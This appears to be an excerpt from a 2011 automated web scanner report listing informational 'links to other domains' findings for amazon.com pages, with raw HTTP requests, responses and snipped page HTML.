Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/188-3953038-0825847"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.552. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /dvds-used-hd-action-comedy-oscar/b

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b?ie\\x3dUTF8\\x26amp;node\\x3d130\\x22
The response contains the following links to other domains:
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /dvds-used-hd-action-comedy-oscar/b?ie\\x3dUTF8\\x26amp;node\\x3d130\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:31 GMT
Server: Server
x-amz-id-1: 16EW5BQW11AZWDFMVQHA
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Qeg7qK9cWHEpdHnnmTiGSC1wRqtj6XEToWtQ6OFmxEjbZWy3wk6SI5Qc1aVAaos6
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=175-0879261-2245254; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/175-0879261-2245254"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.553. http://www.amazon.com/gp/product/0596804946

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/0596804946

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/gp/product/0596804946?ie=UTF8&tag=severdia-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0596804946
The response contains the following links to other domains:

Request

GET /gp/product/0596804946?ie=UTF8&tag=severdia-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0596804946 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:19 GMT
Server: Server
x-amz-id-1: 1GMNYJAKA4TJD7BE20PT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: rRZgZjI7evzN2uK+PGBNvEWrhG1Qajm2TBox690BsTrGBbLn0XvjcMMT1QA/Cp32
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT
Content-Length: 407243


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41je00SqqhL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0596804946"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0596804946/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41je00SqqhL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Using Joomla: Building Powerful and Efficient Web Sites" onmouseover="" /></a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=APyomhRnkQ-LPvW88.Ejiql5o349eF1dM3mWe6EFu.e9Ni4svEpFlNUiUl9y9HiObZMPddQLgzhmNDME.5VbxfDiA0pHePj5MpPmqIZmJv9.Zt1gOJjSGIcvVFrBQtgolsEo4rxodKmNY3PkJFssX54zM0tl92h-z1fax6FlS8PRwsSRnH3bVW.A3SJ2s3TtIa8WUe3uwEvtxvp-Epew3qFWlWdJB7q6yAf4G11gWFlTnQvUb5k4pLtsWnTLc0us4oUFRE7Dl4shTqZZYksEU4cEtKd0knYuPkb0WuXfKIUPiihObkJdDEyfMmhPn9JFFHeNNtwNbuxaAsdboR9Dt05HGNfjH2P.SUIDjNyVnn6ooEsmCiZZT1XUXEdTW64gGFSR864OnYZomiaoJZ6AwLmRdiPquRm0nae9sNNuI1A7-O2E4LjVAmgRVgCR8-U1hsdPM17eEkUOwj3uHNFNF8A9IRc84ORE67f-G23KnHbq3pG8brbMkmwTG0bqZ66g0WWX4AcGQZIKAmuixCeZstWI-1w749GNGLXtCkYG6AhJ5GZJWWa02rrodY4ynIX6LxVV1HaIlDhfQjwjUZhx-OK0rAtYIdktEtom4YWvcLguq3RgZ4dO4oN5SU5S6hy6Qi55gl8gcj.uo2gFbdBSlJiX2Or4jULfrL.qR8SosV6rUZgSTEutgAFXQq3GVkVcKA__&awt=1&s=" rel="nofollow">Create a <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=APyomhRnkQ-LPvW88.Ejiql5o349eF1dM3mWe6EFu.e9Ni4svEpFlNUiUl9y9HiObZMPddQLgzhmNDME.5VbxfDiA0pHePj5MpPmqIZmJv9.Zt1gOJjSGIcvVFrBQtgolsEo4rxodKmNY3PkJFssX54zM0tl92h-z1fax6FlS8PRwsSRnH3bVW.A3SJ2s3TtIa8WUe3uwEvtxvp-Epew3qFWlWdJB7q6yAf4G11gWFlTnQvUb5k4pLtsWnTLc0us4oUFRE7Dl4shTqZZYksEU4cEtKd0knYuPkb0WuXfKIUPiihObkJdDEyfMmhPn9JFFHeNNtwNbuxaAsdboR9Dt05HGNfjH2P.SUIDjNyVnn6ooEsmCiZZT1XUXEdTW64gGFSR864OnYZomiaoJZ6AwLmRdiPquRm0nae9sNNuI1A7-O2E4LjVAmgRVgCR8-U1hsdPM17eEkUOwj3uHNFNF8A9IRc84ORE67f-G23KnHbq3pG8brbMkmwTG0bqZ66g0WWX4AcGQZIKAmuixCeZstWI-1w749GNGLXtCkYG6AhJ5GZJWWa02rrodY4ynIX6LxVV1HaIlDhfQjwjUZhx-OK0rAtYIdktEtom4YWvcLguq3RgZ4dO4oN5SU5S6hy6Qi55gl8gcj.uo2gFbdBSlJiX2Or4jULfrL.qR8SosV6rUZgSTEutgAFXQq3GVkVcKA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=APyomhRnkQ-LPvW88.Ejiql5o349eF1dM3mWe6EFu.e9Ni4svEpFlNUiUl9y9HiObZMPddQLgzhmNDME.5VbxfDiA0pHePj5MpPmqIZmJv9.Zt1gOJjSGIcvVFrBQtgolsEo4rxodKmNY3PkJFssX54zM0tl92h-z1fax6FlS8PRwsSRnH3bVW.A3SJ2s3TtIa8WUe3uwEvtxvp-Epew3qFWlWdJB7q6yAf4G11gWFlTnQvUb5k4pLtsWnTLc0us4oUFRE7Dl4shTqZZYksEU4cEtKd0knYuPkb0WuXfKIUPiihObkJdDEyfMmhPn9JFFHeNNtwNbuxaAsdboR9Dt05HGNfjH2P.SUIDjNyVnn6ooEsmCiZZT1XUXEdTW64gGFSR864OnYZomiaoJZ6AwLmRdiPquRm0nae9sNNuI1A7-O2E4LjVAmgRVgCR8-U1hsdPM17eEkUOwj3uHNFNF8A9IRc84ORE67f-G23KnHbq3pG8brbMkmwTG0bqZ66g0WWX4AcGQZIKAmuixCeZstWI-1w749GNGLXtCkYG6AhJ5GZJWWa02rrodY4ynIX6LxVV1HaIlDhfQjwjUZhx-OK0rAtYIdktEtom4YWvcLguq3RgZ4dO4oN5SU5S6hy6Qi55gl8gcj.uo2gFbdBSlJiX2Or4jULfrL.qR8SosV6rUZgSTEutgAFXQq3GVkVcKA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink"><b>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AAprMKHswX.xOkMSwxKMN5KRV5SdkndQx.aKBLxV85uzmIoZ1miCDJOyXISDg-NoPGi2w9Luv0VirNFt7P0dWW65qrDpOWw5b.XCSRZCTKaXbzcJzkLf1J6ZLK8sxSMtuRuAho30TERFgoElwLcQ1o2vExofDzZmVjSK6LRyl7YiPTe0GAXrFZv3q.A.lykoNqL4XjVXVg3Q3938uYMfvj33xSl7sS9t8pmbqCZG5ngo056QfHR.K5PxaB8A9wN68FFImiUjouGI6QUrWxOrQ3cINxCAjFdpJI1ccpHJBTM0ws-Xx2wiwkTVdkdNV.p..GMUZ4gc-JKt9M42S5lBY81EThSWuqaxc7p09fyFZwXe.4NNvwR8QdKWyQzy7scFX8kxsJfBhBYjDyd.PCRtLEcwWRzH95M43Y3jTw6aRUQSGSRVRh1wQBUDtQ-xg5E8H8b7x2X0c5zT9ZLbNLw-G9jbSv85DQwsRLHrGHIMTs4J6IEpu2wOxsiBxxF75JayimfdsypvQ8YX4c5TK2JwOeed6pgYIMG91h-KjcmcLKp48EkCb66WvqOzYoIvloEOFpnJZdw.QVmWaVZ3pFjHBSGk7ouDvOdRgi-hUTwZG2MVljAplUnPYfcN44eiFR5aU-r9eeYmlBSgymWpemOVpe-sh6bjBolhDHohQOmiOFtn0p5DEWL.U0vGT3O38f4azLA8pYnXxDKbK2vIf6OEEtGQb7OwrEiUK97l7Hh0jSz1spiyJn6hk5Hu3kMKFM2XjrKcMUISu.Xorc2sjeDIFgM_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AAprMKHswX.xOkMSwxKMN5KRV5SdkndQx.aKBLxV85uzmIoZ1miCDJOyXISDg-NoPGi2w9Luv0VirNFt7P0dWW65qrDpOWw5b.XCSRZCTKaXbzcJzkLf1J6ZLK8sxSMtuRuAho30TERFgoElwLcQ1o2vExofDzZmVjSK6LRyl7YiPTe0GAXrFZv3q.A.lykoNqL4XjVXVg3Q3938uYMfvj33xSl7sS9t8pmbqCZG5ngo056QfHR.K5PxaB8A9wN68FFImiUjouGI6QUrWxOrQ3cINxCAjFdpJI1ccpHJBTM0ws-Xx2wiwkTVdkdNV.p..GMUZ4gc-JKt9M42S5lBY81EThSWuqaxc7p09fyFZwXe.4NNvwR8QdKWyQzy7scFX8kxsJfBhBYjDyd.PCRtLEcwWRzH95M43Y3jTw6aRUQSGSRVRh1wQBUDtQ-xg5E8H8b7x2X0c5zT9ZLbNLw-G9jbSv85DQwsRLHrGHIMTs4J6IEpu2wOxsiBxxF75JayimfdsypvQ8YX4c5TK2JwOeed6pgYIMG91h-KjcmcLKp48EkCb66WvqOzYoIvloEOFpnJZdw.QVmWaVZ3pFjHBSGk7ouDvOdRgi-hUTwZG2MVljAplUnPYfcN44eiFR5aU-r9eeYmlBSgymWpemOVpe-sh6bjBolhDHohQOmiOFtn0p5DEWL.U0vGT3O38f4azLA8pYnXxDKbK2vIf6OEEtGQb7OwrEiUK97l7Hh0jSz1spiyJn6hk5Hu3kMKFM2XjrKcMUISu.Xorc2sjeDIFgM_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AAprMKHswX.xOkMSwxKMN5KRV5SdkndQx.aKBLxV85uzmIoZ1miCDJOyXISDg-NoPGi2w9Luv0VirNFt7P0dWW65qrDpOWw5b.XCSRZCTKaXbzcJzkLf1J6ZLK8sxSMtuRuAho30TERFgoElwLcQ1o2vExofDzZmVjSK6LRyl7YiPTe0GAXrFZv3q.A.lykoNqL4XjVXVg3Q3938uYMfvj33xSl7sS9t8pmbqCZG5ngo056QfHR.K5PxaB8A9wN68FFImiUjouGI6QUrWxOrQ3cINxCAjFdpJI1ccpHJBTM0ws-Xx2wiwkTVdkdNV.p..GMUZ4gc-JKt9M42S5lBY81EThSWuqaxc7p09fyFZwXe.4NNvwR8QdKWyQzy7scFX8kxsJfBhBYjDyd.PCRtLEcwWRzH95M43Y3jTw6aRUQSGSRVRh1wQBUDtQ-xg5E8H8b7x2X0c5zT9ZLbNLw-G9jbSv85DQwsRLHrGHIMTs4J6IEpu2wOxsiBxxF75JayimfdsypvQ8YX4c5TK2JwOeed6pgYIMG91h-KjcmcLKp48EkCb66WvqOzYoIvloEOFpnJZdw.QVmWaVZ3pFjHBSGk7ouDvOdRgi-hUTwZG2MVljAplUnPYfcN44eiFR5aU-r9eeYmlBSgymWpemOVpe-sh6bjBolhDHohQOmiOFtn0p5DEWL.U0vGT3O38f4azLA8pYnXxDKbK2vIf6OEEtGQb7OwrEiUK97l7Hh0jSz1spiyJn6hk5Hu3kMKFM2XjrKcMUISu.Xorc2sjeDIFgM_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.lynda.com</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AKmiCqDaY1wea5sNgGyiEJt6U7vSmS4bhrrAmUrkSNhbAREaaHeqmL8NDdGgGx9l9D2ZkAUyCZ.MEM2qkh4RKYw.oTjHITlgEYETjxYLnL7ng.TttFzLJsoWCSlZjJw3qDzCd2k8MElWGN9ZtOPNpa2IuXY4Dv4-KXbHDPb.mUfa4VKPrA5bTZZ06sv7lTvyMgTKsurc33cZ1jOJYodoTi5KD7T3RestmUTevuMzUHf1LvztlxJ30EapuqeqGLNYL6y.vMjp2WxSdZyV9qI4kwO9cCKkuGQHbO4xnreUOOH0FtAKLpBEZxrql9ssPNEPDbSMjR206QSWztnunjRiuPaHxXcy4RsNGaLPmWqJ-hs8DjYBT19EWaMwzVhyTPmwHRxyS84kG8XTaZUR7LMcG5j7M9iyHbOwB5vtwWgJPZIsDS.9vrz.nTq6Ibsk9hs5n00nQeP1h28jHeztdvgIagsT67ljizo8gWr9GYAcNCHDHZ66g.IQ7PEXGbYZjROxFi.pjGth81Sytk4kqfgtwMIs6dnpweh-mc62Hne8ms.VmZvHq6JK02bHSowK.R4ORh7ofnTKn0ecVrJMeRc9nsPUZZ4CrWtDuJVDp.QS6Y0YwMUHRvtjWsKF1DVLSBpwiA__&awt=1&s=" rel="nofollow">Verizon Official <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AKmiCqDaY1wea5sNgGyiEJt6U7vSmS4bhrrAmUrkSNhbAREaaHeqmL8NDdGgGx9l9D2ZkAUyCZ.MEM2qkh4RKYw.oTjHITlgEYETjxYLnL7ng.TttFzLJsoWCSlZjJw3qDzCd2k8MElWGN9ZtOPNpa2IuXY4Dv4-KXbHDPb.mUfa4VKPrA5bTZZ06sv7lTvyMgTKsurc33cZ1jOJYodoTi5KD7T3RestmUTevuMzUHf1LvztlxJ30EapuqeqGLNYL6y.vMjp2WxSdZyV9qI4kwO9cCKkuGQHbO4xnreUOOH0FtAKLpBEZxrql9ssPNEPDbSMjR206QSWztnunjRiuPaHxXcy4RsNGaLPmWqJ-hs8DjYBT19EWaMwzVhyTPmwHRxyS84kG8XTaZUR7LMcG5j7M9iyHbOwB5vtwWgJPZIsDS.9vrz.nTq6Ibsk9hs5n00nQeP1h28jHeztdvgIagsT67ljizo8gWr9GYAcNCHDHZ66g.IQ7PEXGbYZjROxFi.pjGth81Sytk4kqfgtwMIs6dnpweh-mc62Hne8ms.VmZvHq6JK02bHSowK.R4ORh7ofnTKn0ecVrJMeRc9nsPUZZ4CrWtDuJVDp.QS6Y0YwMUHRvtjWsKF1DVLSBpwiA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AKmiCqDaY1wea5sNgGyiEJt6U7vSmS4bhrrAmUrkSNhbAREaaHeqmL8NDdGgGx9l9D2ZkAUyCZ.MEM2qkh4RKYw.oTjHITlgEYETjxYLnL7ng.TttFzLJsoWCSlZjJw3qDzCd2k8MElWGN9ZtOPNpa2IuXY4Dv4-KXbHDPb.mUfa4VKPrA5bTZZ06sv7lTvyMgTKsurc33cZ1jOJYodoTi5KD7T3RestmUTevuMzUHf1LvztlxJ30EapuqeqGLNYL6y.vMjp2WxSdZyV9qI4kwO9cCKkuGQHbO4xnreUOOH0FtAKLpBEZxrql9ssPNEPDbSMjR206QSWztnunjRiuPaHxXcy4RsNGaLPmWqJ-hs8DjYBT19EWaMwzVhyTPmwHRxyS84kG8XTaZUR7LMcG5j7M9iyHbOwB5vtwWgJPZIsDS.9vrz.nTq6Ibsk9hs5n00nQeP1h28jHeztdvgIagsT67ljizo8gWr9GYAcNCHDHZ66g.IQ7PEXGbYZjROxFi.pjGth81Sytk4kqfgtwMIs6dnpweh-mc62Hne8ms.VmZvHq6JK02bHSowK.R4ORh7ofnTKn0ecVrJMeRc9nsPUZZ4CrWtDuJVDp.QS6Y0YwMUHRvtjWsKF1DVLSBpwiA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">verizon.com/SmallBusiness</a>
...[SNIP]...
<a href="http://www.amazon.com/Using-Joomla-Building-Powerful-Efficient/dp/0596804946/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41je00SqqhL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Using Joomla: Building Powerful and Efficient Web Sites" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-1-5-Building-Successful-Powered/dp/0137012314/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Joomla! 1.5: A User's Guide: Building a Successful Joomla! Powered Website (2nd Edition)" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Joomla-Start-Finish-Maintain-Programmer/dp/047057089X/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Joomla! Start to Finish: How to Plan, Execute, and Maintain Your Web Site (Wrox Programmer to Programmer)" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51wRgcBVifL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51J3zzq8r3L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51-3onLAtSL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ERW1EpDfL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41nA%2B5xP9aL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51%2Bj7YLtawL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41je00SqqhL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Using Joomla: Building Powerful and Efficient Web Sites" height="50" border="0" /></td>
...[SNIP]...
